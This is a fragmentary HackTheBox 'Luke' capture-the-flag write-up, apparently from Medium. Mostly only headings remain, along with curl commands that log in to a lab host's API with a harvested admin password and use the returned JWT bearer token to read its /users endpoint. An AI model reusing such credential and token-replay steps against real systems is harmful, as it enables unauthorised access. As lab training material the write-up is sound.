[HTB] Luke — Write-up

Recon

Nmap

21/TCP

80/TCP

3000/TCP

8000/TCP

Dirsearch

80/TCP

3000/TCP

Exploit

JWT Authentication

curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/login

Bearer Token

curl -X GET -H 'Authorization: Bearer   eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NDM4OTMyLCJleHAiOjE1Njg1MjUzMzJ9.BE9YFXdpJdY4ZqfWziOwVA8Tg2aHiecIX1TX0hW0mNI' http://10.10.10.137:3000
curl -X GET -H 'Authorization: Bearer   eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NDM4OTMyLCJleHAiOjE1Njg1MjUzMzJ9.BE9YFXdpJdY4ZqfWziOwVA8Tg2aHiecIX1TX0hW0mNI' http://10.10.10.137:3000/users

Password Harvesting

/management

ajenti

Root Access

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store